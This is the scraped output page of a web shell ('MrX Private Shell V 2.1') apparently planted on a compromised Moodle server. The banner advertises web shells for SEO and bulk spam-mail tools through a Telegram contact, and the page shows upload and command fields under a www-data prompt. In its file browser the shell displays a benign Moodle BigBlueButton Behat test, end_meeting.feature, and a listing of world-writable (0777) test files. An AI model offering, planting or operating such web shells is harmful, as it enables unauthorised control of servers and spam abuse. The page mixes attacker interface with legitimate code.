__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
@mod @mod_bigbluebuttonbn
Feature: Test the ability to end a meeting
  In order to ensure that end meeting capabilities are respected
  As a teacher
  I need to control who can end a meeting

  Background:
    Given a BigBlueButton mock server is configured
    And I enable "bigbluebuttonbn" "mod" plugin

  Scenario Outline: Only a BigBlueButton moderator can end a session
    Given the following course exists:
      | name      | Test course |
      | shortname | C1          |
    And the following "users" exist:
      | username | firstname | lastname | email                 |
      | traverst | Terry     | Travers  | t.travers@example.com |
    And the following "course enrolments" exist:
      | user     | course | role   |
      | traverst | C1     | <role> |
    And the following "activity" exists:
      | course     | C1              |
      | activity   | bigbluebuttonbn |
      | name       | Room recordings |
      | idnumber   | Room recordings |
      | moderators | <moderators>    |
    And the following "mod_bigbluebuttonbn > meeting" exists:
      | activity         | Room recordings |
    When I am on the "Room recordings" Activity page logged in as traverst
    Then "End session" "link" <existence> exist

    Examples:
      # Note: If the teacher is not listed as a moderator in the activity roles, then will not have permission to end the
      # session.
      | moderators    | role           | existence  |
      |               | editingteacher | should not |
      |               | teacher        | should not |
      |               | student        | should not |
      | role:teacher  | student        | should not |
      | role:teacher  | teacher        | should     |
      | role:student  | student        | should     |
      | user:traverst | student        | should     |

  Scenario: An administrator can always end a meeting
    Given the following course exists:
      | name      | Test course |
      | shortname | C1          |
    And the following "activity" exists:
      | course     | C1              |
      | activity   | bigbluebuttonbn |
      | name       | Room recordings |
      | idnumber   | Room recordings |
    And the following "mod_bigbluebuttonbn > meeting" exists:
      | activity         | Room recordings |
    When I am on the "Room recordings" Activity page logged in as admin
    Then "End session" "link" should exist

  Scenario Outline: Only a BigBlueButton moderator can end a session from the index page
    Given the following course exists:
      | name      | Test course |
      | shortname | C1          |
    And the following "users" exist:
      | username | firstname | lastname | email                 |
      | traverst | Terry     | Travers  | t.travers@example.com |
    And the following "course enrolments" exist:
      | user     | course | role   |
      | traverst | C1     | <role> |
    And the following "activity" exists:
      | course     | C1              |
      | activity   | bigbluebuttonbn |
      | name       | Room recordings |
      | idnumber   | Room recordings |
      | moderators | <moderators>    |
    And the following "mod_bigbluebuttonbn > meeting" exists:
      | activity         | Room recordings |
    When I am on the C1 "mod_bigbluebuttonbn > Index" page logged in as traverst
    Then "End session" "link" <existence> exist

    Examples:
      # Note: If the teacher is not listed as a moderator in the activity roles, then will not have permission to end the
      # session.
      | moderators    | role           | existence  |
      |               | editingteacher | should not |
      |               | teacher        | should not |
      |               | student        | should not |
      | role:teacher  | student        | should not |
      | role:teacher  | teacher        | should     |
      | role:student  | student        | should     |
      | user:traverst | student        | should     |

  Scenario: An administrator can always end a meeting on the index page
    Given the following course exists:
      | name      | Test course |
      | shortname | C1          |
    And the following "activity" exists:
      | course     | C1              |
      | activity   | bigbluebuttonbn |
      | name       | Room recordings |
      | idnumber   | Room recordings |
    And the following "mod_bigbluebuttonbn > meeting" exists:
      | activity         | Room recordings |
    When I am on the C1 "mod_bigbluebuttonbn > Index" page logged in as admin
    Then "End session" "link" should exist

Filemanager

Name Type Size Permission Actions
fixtures Folder 0777
add_instance.feature File 2.57 KB 0777
add_instance_in_empty_state.feature File 2.36 KB 0777
behat_mod_bigbluebuttonbn.php File 10.28 KB 0777
bigbluebuttonbn_activity_availability.feature File 2.31 KB 0777
completion.feature File 3.48 KB 0777
edit_instance.feature File 3.06 KB 0777
end_meeting.feature File 4.45 KB 0777
group_mode.feature File 7.95 KB 0777
guest_access.feature File 4.28 KB 0777
join_meeting.feature File 2.97 KB 0777
join_meeting_as_guest.feature File 2.4 KB 0777
lock_settings.feature File 2.99 KB 0777
meeting_roles.feature File 1.78 KB 0777
recordings.feature File 3.85 KB 0777
recordings_import.feature File 6.96 KB 0777
roles.feature File 1.11 KB 0777
room.feature File 2.22 KB 0777
start_meeting.feature File 4.41 KB 0777
subplugins.feature File 5.99 KB 0777
view_presentation.feature File 2.96 KB 0777
Filemanager